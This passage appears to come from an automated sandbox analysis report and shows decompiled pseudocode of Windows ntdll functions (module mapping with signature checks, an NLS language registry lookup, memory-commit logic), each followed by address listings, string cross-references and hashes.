                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 2994545307-1948996284
                                                          • Opcode ID: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6
                                                          • Instruction ID: 73874d2587d934a539b0a4a15e4d56a3774b6ad689fdb452dbfd0b5a82c87acf
                                                          • Opcode Fuzzy Hash: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6
                                                          • Instruction Fuzzy Hash: 6B911631A0020AAFDF58DF59D880ABEBBF5FF40B14B4481AED985AB544E730E945CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E010C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				signed int _t73;
                                                          				void* _t77;
                                                          				char* _t82;
                                                          				char* _t87;
                                                          				signed char* _t97;
                                                          				signed char _t102;
                                                          				intOrPtr _t107;
                                                          				signed char* _t108;
                                                          				intOrPtr _t112;
                                                          				intOrPtr _t124;
                                                          				intOrPtr _t125;
                                                          				intOrPtr _t126;
                                                          
                                                          				_t107 = __edx;
                                                          				_v12 = __ecx;
                                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                          				_t124 = 0;
                                                          				_v20 = __edx;
                                                          				if(E010CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                          					_t112 = _v8;
                                                          				} else {
                                                          					_t112 = 0;
                                                          					_v8 = 0;
                                                          				}
                                                          				if(_t112 != 0) {
                                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                          						_t124 = 0xc000007b;
                                                          						goto L8;
                                                          					}
                                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                          					 *(_t125 + 0x34) = _t73;
                                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                          						goto L3;
                                                          					}
                                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                          					_t124 = E010BC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                          					if(_t124 < 0) {
                                                          						goto L8;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          				} else {
                                                          					L3:
                                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                          						L8:
                                                          						return _t124;
                                                          					}
                                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                          							goto L5;
                                                          						}
                                                          						_t102 =  *0x11a5780; // 0x0
                                                          						if((_t102 & 0x00000003) != 0) {
                                                          							E01135510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                          							_t102 =  *0x11a5780; // 0x0
                                                          						}
                                                          						if((_t102 & 0x00000010) != 0) {
                                                          							asm("int3");
                                                          						}
                                                          						_t124 = 0xc0000428;
                                                          						goto L8;
                                                          					}
                                                          					L5:
                                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                          						goto L8;
                                                          					}
                                                          					_t77 = _a4 - 0x40000003;
                                                          					if(_t77 == 0 || _t77 == 0x33) {
                                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                          						if(E010D7D50() != 0) {
                                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                          						} else {
                                                          							_t82 = 0x7ffe0384;
                                                          						}
                                                          						_t108 = 0x7ffe0385;
                                                          						if( *_t82 != 0) {
                                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                          								if(E010D7D50() == 0) {
                                                          									_t97 = 0x7ffe0385;
                                                          								} else {
                                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                          								}
                                                          								if(( *_t97 & 0x00000020) != 0) {
                                                          									E01137016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a4 != 0x40000003) {
                                                          							L14:
                                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                          							if(E010D7D50() != 0) {
                                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                          							} else {
                                                          								_t87 = 0x7ffe0384;
                                                          							}
                                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                          								if(E010D7D50() != 0) {
                                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                          								}
                                                          								if(( *_t108 & 0x00000020) != 0) {
                                                          									E01137016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                          								}
                                                          							}
                                                          							goto L8;
                                                          						} else {
                                                          							_v16 = _t125 + 0x24;
                                                          							_t124 = E010EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                          							if(_t124 < 0) {
                                                          								E010BB1E1(_t124, 0x1490, 0, _v16);
                                                          								goto L8;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          					} else {
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}




















                                                          0x010c7e4c
                                                          0x010c7e50
                                                          0x010c7e55
                                                          0x010c7e58
                                                          0x010c7e5d
                                                          0x010c7e71
                                                          0x010c7f33
                                                          0x010c7e77
                                                          0x010c7e77
                                                          0x010c7e79
                                                          0x010c7e79
                                                          0x010c7e7e
                                                          0x010c7f45
                                                          0x01119848
                                                          0x00000000
                                                          0x01119848
                                                          0x010c7f4e
                                                          0x010c7f53
                                                          0x010c7f5a
                                                          0x00000000
                                                          0x00000000
                                                          0x0111985a
                                                          0x01119862
                                                          0x01119866
                                                          0x00000000
                                                          0x0111986c
                                                          0x00000000
                                                          0x0111986c
                                                          0x010c7e84
                                                          0x010c7e84
                                                          0x010c7e8d
                                                          0x01119871
                                                          0x010c7eb8
                                                          0x010c7ec0
                                                          0x010c7ec0
                                                          0x010c7e9a
                                                          0x0111987e
                                                          0x00000000
                                                          0x00000000
                                                          0x01119884
                                                          0x0111988b
                                                          0x011198a7
                                                          0x011198ac
                                                          0x011198b1
                                                          0x011198b6
                                                          0x011198b8
                                                          0x011198b8
                                                          0x011198b9
                                                          0x00000000
                                                          0x011198b9
                                                          0x010c7ea0
                                                          0x010c7ea7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c7eac
                                                          0x010c7eb1
                                                          0x010c7ec6
                                                          0x010c7ed0
                                                          0x011198cc
                                                          0x010c7ed6
                                                          0x010c7ed6
                                                          0x010c7ed6
                                                          0x010c7ede
                                                          0x010c7ee3
                                                          0x011198e3
                                                          0x011198f0
                                                          0x01119902
                                                          0x011198f2
                                                          0x011198fb
                                                          0x011198fb
                                                          0x01119907
                                                          0x0111991d
                                                          0x0111991d
                                                          0x01119907
                                                          0x011198e3
                                                          0x010c7ef0
                                                          0x010c7f14
                                                          0x010c7f14
                                                          0x010c7f1e
                                                          0x01119946
                                                          0x010c7f24
                                                          0x010c7f24
                                                          0x010c7f24
                                                          0x010c7f2c
                                                          0x0111996a
                                                          0x01119975
                                                          0x01119975
                                                          0x0111997e
                                                          0x01119993
                                                          0x01119993
                                                          0x0111997e
                                                          0x00000000
                                                          0x010c7ef2
                                                          0x010c7efc
                                                          0x010c7f0a
                                                          0x010c7f0e
                                                          0x01119933
                                                          0x00000000
                                                          0x01119933
                                                          0x00000000
                                                          0x010c7f0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c7eb1

                                                          Strings
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 011198A2
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01119891
                                                          • LdrpCompleteMapModule, xrefs: 01119898
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5
                                                          • Instruction ID: 78cfbce50914f63f5a4e4152af38e43a7d5ba3f0d6966685b5710864c7ba80ac
                                                          • Opcode Fuzzy Hash: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5
                                                          • Instruction Fuzzy Hash: B451243260074ADBEB2ACB5DC954B6EBBE4AB05B18F0405ADE9A19B3D5D730ED00CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010BE620(void* __ecx, short* __edx, short* _a4) {
                                                          				char _v16;
                                                          				char _v20;
                                                          				intOrPtr _v24;
                                                          				char* _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v52;
                                                          				void* _v56;
                                                          				void* _v60;
                                                          				char _v64;
                                                          				void* _v68;
                                                          				void* _v76;
                                                          				void* _v84;
                                                          				signed int _t59;
                                                          				signed int _t74;
                                                          				signed short* _t75;
                                                          				signed int _t76;
                                                          				signed short* _t78;
                                                          				signed int _t83;
                                                          				short* _t93;
                                                          				signed short* _t94;
                                                          				short* _t96;
                                                          				void* _t97;
                                                          				signed int _t99;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t80 = __ecx;
                                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                          				_t96 = __edx;
                                                          				_v44 = __edx;
                                                          				_t78 = 0;
                                                          				_v56 = 0;
                                                          				if(__ecx == 0 || __edx == 0) {
                                                          					L28:
                                                          					_t97 = 0xc000000d;
                                                          				} else {
                                                          					_t93 = _a4;
                                                          					if(_t93 == 0) {
                                                          						goto L28;
                                                          					}
                                                          					_t78 = E010BF358(__ecx, 0xac);
                                                          					if(_t78 == 0) {
                                                          						_t97 = 0xc0000017;
                                                          						L6:
                                                          						if(_v56 != 0) {
                                                          							_push(_v56);
                                                          							E010F95D0();
                                                          						}
                                                          						if(_t78 != 0) {
                                                          							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                          						}
                                                          						return _t97;
                                                          					}
                                                          					E010FFA60(_t78, 0, 0x158);
                                                          					_v48 = _v48 & 0x00000000;
                                                          					_t102 = _t101 + 0xc;
                                                          					 *_t96 = 0;
                                                          					 *_t93 = 0;
                                                          					E010FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                          					_v36 = 0x18;
                                                          					_v28 =  &_v44;
                                                          					_v64 = 0;
                                                          					_push( &_v36);
                                                          					_push(0x20019);
                                                          					_v32 = 0;
                                                          					_push( &_v64);
                                                          					_v24 = 0x40;
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					_t97 = E010F9600();
                                                          					if(_t97 < 0) {
                                                          						goto L6;
                                                          					}
                                                          					E010FBB40(0,  &_v36, L"InstallLanguageFallback");
                                                          					_push(0);
                                                          					_v48 = 4;
                                                          					_t97 = L010BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                          					if(_t97 >= 0) {
                                                          						if(_v52 != 1) {
                                                          							L17:
                                                          							_t97 = 0xc0000001;
                                                          							goto L6;
                                                          						}
                                                          						_t59 =  *_t78 & 0x0000ffff;
                                                          						_t94 = _t78;
                                                          						_t83 = _t59;
                                                          						if(_t59 == 0) {
                                                          							L19:
                                                          							if(_t83 == 0) {
                                                          								L23:
                                                          								E010FBB40(_t83, _t102 + 0x24, _t78);
                                                          								if(L010C43C0( &_v48,  &_v64) == 0) {
                                                          									goto L17;
                                                          								}
                                                          								_t84 = _v48;
                                                          								 *_v48 = _v56;
                                                          								if( *_t94 != 0) {
                                                          									E010FBB40(_t84, _t102 + 0x24, _t94);
                                                          									if(L010C43C0( &_v48,  &_v64) != 0) {
                                                          										 *_a4 = _v56;
                                                          									} else {
                                                          										_t97 = 0xc0000001;
                                                          										 *_v48 = 0;
                                                          									}
                                                          								}
                                                          								goto L6;
                                                          							}
                                                          							_t83 = _t83 & 0x0000ffff;
                                                          							while(_t83 == 0x20) {
                                                          								_t94 =  &(_t94[1]);
                                                          								_t74 =  *_t94 & 0x0000ffff;
                                                          								_t83 = _t74;
                                                          								if(_t74 != 0) {
                                                          									continue;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							goto L23;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          						while(1) {
                                                          							L14:
                                                          							_t27 =  &(_t94[1]); // 0x2
                                                          							_t75 = _t27;
                                                          							if(_t83 == 0x2c) {
                                                          								break;
                                                          							}
                                                          							_t94 = _t75;
                                                          							_t76 =  *_t94 & 0x0000ffff;
                                                          							_t83 = _t76;
                                                          							if(_t76 != 0) {
                                                          								continue;
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          						 *_t94 = 0;
                                                          						_t94 = _t75;
                                                          						_t83 =  *_t75 & 0x0000ffff;
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}































                                                          0x010be620
                                                          0x010be628
                                                          0x010be62f
                                                          0x010be631
                                                          0x010be635
                                                          0x010be637
                                                          0x010be63e
                                                          0x01115503
                                                          0x01115503
                                                          0x010be64c
                                                          0x010be64c
                                                          0x010be651
                                                          0x00000000
                                                          0x00000000
                                                          0x010be661
                                                          0x010be665
                                                          0x0111542a
                                                          0x010be715
                                                          0x010be71a
                                                          0x010be71c
                                                          0x010be720
                                                          0x010be720
                                                          0x010be727
                                                          0x010be736
                                                          0x010be736
                                                          0x010be743
                                                          0x010be743
                                                          0x010be673
                                                          0x010be678
                                                          0x010be67d
                                                          0x010be682
                                                          0x010be685
                                                          0x010be692
                                                          0x010be69b
                                                          0x010be6a3
                                                          0x010be6ad
                                                          0x010be6b1
                                                          0x010be6b2
                                                          0x010be6bb
                                                          0x010be6bf
                                                          0x010be6c0
                                                          0x010be6c8
                                                          0x010be6cc
                                                          0x010be6d5
                                                          0x010be6d9
                                                          0x00000000
                                                          0x00000000
                                                          0x010be6e5
                                                          0x010be6ea
                                                          0x010be6f9
                                                          0x010be70b
                                                          0x010be70f
                                                          0x01115439
                                                          0x0111545e
                                                          0x0111545e
                                                          0x00000000
                                                          0x0111545e
                                                          0x0111543b
                                                          0x0111543e
                                                          0x01115440
                                                          0x01115445
                                                          0x01115472
                                                          0x01115475
                                                          0x0111548d
                                                          0x01115493
                                                          0x011154a9
                                                          0x00000000
                                                          0x00000000
                                                          0x011154ab
                                                          0x011154b4
                                                          0x011154bc
                                                          0x011154c8
                                                          0x011154de
                                                          0x011154fb
                                                          0x011154e0
                                                          0x011154e6
                                                          0x011154eb
                                                          0x011154eb
                                                          0x011154de
                                                          0x00000000
                                                          0x011154bc
                                                          0x01115477
                                                          0x0111547a
                                                          0x01115480
                                                          0x01115483
                                                          0x01115486
                                                          0x0111548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0111548b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01115447
                                                          0x01115447
                                                          0x01115447
                                                          0x01115447
                                                          0x0111544e
                                                          0x00000000
                                                          0x00000000
                                                          0x01115450
                                                          0x01115452
                                                          0x01115455
                                                          0x0111545a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0111545c
                                                          0x0111546a
                                                          0x0111546d
                                                          0x0111546f
                                                          0x00000000
                                                          0x0111546f
                                                          0x010be70f

                                                          Strings
                                                          • InstallLanguageFallback, xrefs: 010BE6DB
                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010BE68C
                                                          • @, xrefs: 010BE6C0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                          • API String ID: 0-1757540487
                                                          • Opcode ID: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b
                                                          • Instruction ID: 5c433435fd827ebf4c44a846dda3a873a7e379341cec5ca1dd07d2f460d8b457
                                                          • Opcode Fuzzy Hash: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b
                                                          • Instruction Fuzzy Hash: 5051B1725083069BD754DF68C480AABB7E9BF89614F05092EFAC5E7640F734D904CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E0117E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				signed int _v40;
                                                          				char _v44;
                                                          				intOrPtr _v48;
                                                          				signed int _v52;
                                                          				unsigned int _v56;
                                                          				char _v60;
                                                          				signed int _v64;
                                                          				char _v68;
                                                          				signed int _v72;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				char _t87;
                                                          				signed int _t90;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				intOrPtr* _t113;
                                                          				signed int _t122;
                                                          				void* _t132;
                                                          				void* _t135;
                                                          				signed int _t139;
                                                          				signed int* _t141;
                                                          				signed int _t146;
                                                          				signed int _t147;
                                                          				void* _t153;
                                                          				signed int _t155;
                                                          				signed int _t159;
                                                          				char _t166;
                                                          				void* _t172;
                                                          				void* _t176;
                                                          				signed int _t177;
                                                          				intOrPtr* _t179;
                                                          
                                                          				_t179 = __ecx;
                                                          				_v48 = __edx;
                                                          				_v68 = 0;
                                                          				_v72 = 0;
                                                          				_push(__ecx[1]);
                                                          				_push( *__ecx);
                                                          				_push(0);
                                                          				_t153 = 0x14;
                                                          				_t135 = _t153;
                                                          				_t132 = E0117BBBB(_t135, _t153);
                                                          				if(_t132 == 0) {
                                                          					_t166 = _v68;
                                                          					goto L43;
                                                          				} else {
                                                          					_t155 = 0;
                                                          					_v52 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v56 = __ecx[1];
                                                          					if( *__ecx >> 8 < 2) {
                                                          						_t155 = 1;
                                                          						_v52 = 1;
                                                          					}
                                                          					_t139 = _a4;
                                                          					_t87 = (_t155 << 0xc) + _t139;
                                                          					_v60 = _t87;
                                                          					if(_t87 < _t139) {
                                                          						L11:
                                                          						_t166 = _v68;
                                                          						L12:
                                                          						if(_t132 != 0) {
                                                          							E0117BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                          						}
                                                          						L43:
                                                          						if(_v72 != 0) {
                                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                                          							_push( *_t179);
                                                          							_push(0x8000);
                                                          							E0117AFDE( &_v72,  &_v60);
                                                          						}
                                                          						L46:
                                                          						return _t166;
                                                          					}
                                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                          					asm("sbb edi, edi");
                                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                          					if(_t90 != 0) {
                                                          						_push(0);
                                                          						_push(0x14);
                                                          						_push( &_v44);
                                                          						_push(3);
                                                          						_push(_t179);
                                                          						_push(0xffffffff);
                                                          						if(E010F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                          							_push(_t139);
                                                          							E0117A80D(_t179, 1, _v40, 0);
                                                          							_t172 = 4;
                                                          						}
                                                          					}
                                                          					_t141 =  &_v72;
                                                          					if(E0117A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                          						_v64 = _a4;
                                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                          						asm("sbb edi, edi");
                                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                          						if(_t94 != 0) {
                                                          							_push(0);
                                                          							_push(0x14);
                                                          							_push( &_v24);
                                                          							_push(3);
                                                          							_push(_t179);
                                                          							_push(0xffffffff);
                                                          							if(E010F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                          								_push(_t141);
                                                          								E0117A80D(_t179, 1, _v20, 0);
                                                          								_t176 = 4;
                                                          							}
                                                          						}
                                                          						if(E0117A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_t177 = _v64;
                                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                          							_t100 = _v52 + _v52;
                                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                          							 *(_t132 + 0x10) = _t146;
                                                          							asm("bsf eax, [esp+0x18]");
                                                          							_v52 = _t100;
                                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                          							_t47 =  &_a8;
                                                          							 *_t47 = _a8 & 0x00000001;
                                                          							if( *_t47 == 0) {
                                                          								E010D2280(_t179 + 0x30, _t179 + 0x30);
                                                          							}
                                                          							_t147 =  *(_t179 + 0x34);
                                                          							_t159 =  *(_t179 + 0x38) & 1;
                                                          							_v68 = 0;
                                                          							if(_t147 == 0) {
                                                          								L35:
                                                          								E010CB090(_t179 + 0x34, _t147, _v68, _t132);
                                                          								if(_a8 == 0) {
                                                          									E010CFFB0(_t132, _t177, _t179 + 0x30);
                                                          								}
                                                          								asm("lock xadd [eax], ecx");
                                                          								asm("lock xadd [eax], edx");
                                                          								_t132 = 0;
                                                          								_v72 = _v72 & 0;
                                                          								_v68 = _v72;
                                                          								if(E010D7D50() == 0) {
                                                          									_t113 = 0x7ffe0388;
                                                          								} else {
                                                          									_t177 = _v64;
                                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                          								}
                                                          								if( *_t113 == _t132) {
                                                          									_t166 = _v68;
                                                          									goto L46;
                                                          								} else {
                                                          									_t166 = _v68;
                                                          									E0116FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                          									goto L12;
                                                          								}
                                                          							} else {
                                                          								L23:
                                                          								while(1) {
                                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                          										_t122 =  *_t147;
                                                          										if(_t159 == 0) {
                                                          											L32:
                                                          											if(_t122 == 0) {
                                                          												L34:
                                                          												_v68 = 0;
                                                          												goto L35;
                                                          											}
                                                          											L33:
                                                          											_t147 = _t122;
                                                          											continue;
                                                          										}
                                                          										if(_t122 == 0) {
                                                          											goto L34;
                                                          										}
                                                          										_t122 = _t122 ^ _t147;
                                                          										goto L32;
                                                          									}
                                                          									_t122 =  *(_t147 + 4);
                                                          									if(_t159 == 0) {
                                                          										L27:
                                                          										if(_t122 != 0) {
                                                          											goto L33;
                                                          										}
                                                          										L28:
                                                          										_v68 = 1;
                                                          										goto L35;
                                                          									}
                                                          									if(_t122 == 0) {
                                                          										goto L28;
                                                          									}
                                                          									_t122 = _t122 ^ _t147;
                                                          									goto L27;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					_v72 = _v72 & 0x00000000;
                                                          					goto L11;
                                                          				}
                                                          			}




































                                                          0x0117e547
                                                          0x0117e549
                                                          0x0117e54f
                                                          0x0117e553
                                                          0x0117e557
                                                          0x0117e55a
                                                          0x0117e55c
                                                          0x0117e55f
                                                          0x0117e561
                                                          0x0117e567
                                                          0x0117e56b
                                                          0x0117e7e2
                                                          0x00000000
                                                          0x0117e571
                                                          0x0117e575
                                                          0x0117e577
                                                          0x0117e57b
                                                          0x0117e57c
                                                          0x0117e57d
                                                          0x0117e57e
                                                          0x0117e57f
                                                          0x0117e588
                                                          0x0117e58f
                                                          0x0117e591
                                                          0x0117e592
                                                          0x0117e592
                                                          0x0117e596
                                                          0x0117e59e
                                                          0x0117e5a0
                                                          0x0117e5a6
                                                          0x0117e61d
                                                          0x0117e61d
                                                          0x0117e621
                                                          0x0117e623
                                                          0x0117e630
                                                          0x0117e630
                                                          0x0117e7e6
                                                          0x0117e7eb
                                                          0x0117e7ed
                                                          0x0117e7f4
                                                          0x0117e7fa
                                                          0x0117e7ff
                                                          0x0117e7ff
                                                          0x0117e80a
                                                          0x0117e812
                                                          0x0117e812
                                                          0x0117e5ab
                                                          0x0117e5b4
                                                          0x0117e5b9
                                                          0x0117e5be
                                                          0x0117e5c0
                                                          0x0117e5c2
                                                          0x0117e5c8
                                                          0x0117e5c9
                                                          0x0117e5cb
                                                          0x0117e5cc
                                                          0x0117e5d5
                                                          0x0117e5e4
                                                          0x0117e5f1
                                                          0x0117e5f8
                                                          0x0117e5f8
                                                          0x0117e5d5
                                                          0x0117e602
                                                          0x0117e616
                                                          0x0117e63d
                                                          0x0117e644
                                                          0x0117e64d
                                                          0x0117e652
                                                          0x0117e657
                                                          0x0117e659
                                                          0x0117e65b
                                                          0x0117e661
                                                          0x0117e662
                                                          0x0117e664
                                                          0x0117e665
                                                          0x0117e66e
                                                          0x0117e67d
                                                          0x0117e68a
                                                          0x0117e691
                                                          0x0117e691
                                                          0x0117e66e
                                                          0x0117e6b0
                                                          0x00000000
                                                          0x0117e6b6
                                                          0x0117e6bd
                                                          0x0117e6c7
                                                          0x0117e6d7
                                                          0x0117e6d9
                                                          0x0117e6db
                                                          0x0117e6de
                                                          0x0117e6e3
                                                          0x0117e6f3
                                                          0x0117e6fc
                                                          0x0117e700
                                                          0x0117e700
                                                          0x0117e704
                                                          0x0117e70a
                                                          0x0117e70a
                                                          0x0117e713
                                                          0x0117e716
                                                          0x0117e719
                                                          0x0117e720
                                                          0x0117e761
                                                          0x0117e76b
                                                          0x0117e774
                                                          0x0117e77a
                                                          0x0117e77a
                                                          0x0117e78a
                                                          0x0117e791
                                                          0x0117e799
                                                          0x0117e79b
                                                          0x0117e79f
                                                          0x0117e7aa
                                                          0x0117e7c0
                                                          0x0117e7ac
                                                          0x0117e7b2
                                                          0x0117e7b9
                                                          0x0117e7b9
                                                          0x0117e7c7
                                                          0x0117e806
                                                          0x00000000
                                                          0x0117e7c9
                                                          0x0117e7d1
                                                          0x0117e7d8
                                                          0x00000000
                                                          0x0117e7d8
                                                          0x00000000
                                                          0x00000000
                                                          0x0117e722
                                                          0x0117e72e
                                                          0x0117e748
                                                          0x0117e74c
                                                          0x0117e754
                                                          0x0117e756
                                                          0x0117e75c
                                                          0x0117e75c
                                                          0x00000000
                                                          0x0117e75c
                                                          0x0117e758
                                                          0x0117e758
                                                          0x00000000
                                                          0x0117e758
                                                          0x0117e750
                                                          0x00000000
                                                          0x00000000
                                                          0x0117e752
                                                          0x00000000
                                                          0x0117e752
                                                          0x0117e730
                                                          0x0117e735
                                                          0x0117e73d
                                                          0x0117e73f
                                                          0x00000000
                                                          0x00000000
                                                          0x0117e741
                                                          0x0117e741
                                                          0x00000000
                                                          0x0117e741
                                                          0x0117e739
                                                          0x00000000
                                                          0x00000000
                                                          0x0117e73b
                                                          0x00000000
                                                          0x0117e73b
                                                          0x0117e722
                                                          0x0117e720
                                                          0x0117e6b0
                                                          0x0117e618
                                                          0x00000000
                                                          0x0117e618

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                          • Instruction ID: ac05755f5c0d3e27286849cedaf07305ed5e30ec60031f22bb0bedc936ede21c
                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                          • Instruction Fuzzy Hash: 08917E712057429BE728CF29C841B5BBBF6AF84714F18896DF695CB380E774E904CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E011351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed short* _t63;
                                                          				signed int _t64;
                                                          				signed int _t65;
                                                          				signed int _t67;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t84;
                                                          				intOrPtr _t88;
                                                          				intOrPtr _t94;
                                                          				void* _t100;
                                                          				void* _t103;
                                                          				intOrPtr _t105;
                                                          				signed int _t106;
                                                          				short* _t108;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int* _t115;
                                                          				signed short* _t117;
                                                          				void* _t118;
                                                          				void* _t119;
                                                          
                                                          				_push(0x80);
                                                          				_push(0x11905f0);
                                                          				E0110D0E8(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                          				_t115 =  *(_t118 + 0xc);
                                                          				 *(_t118 - 0x7c) = _t115;
                                                          				 *((char*)(_t118 - 0x65)) = 0;
                                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                          				_t113 = 0;
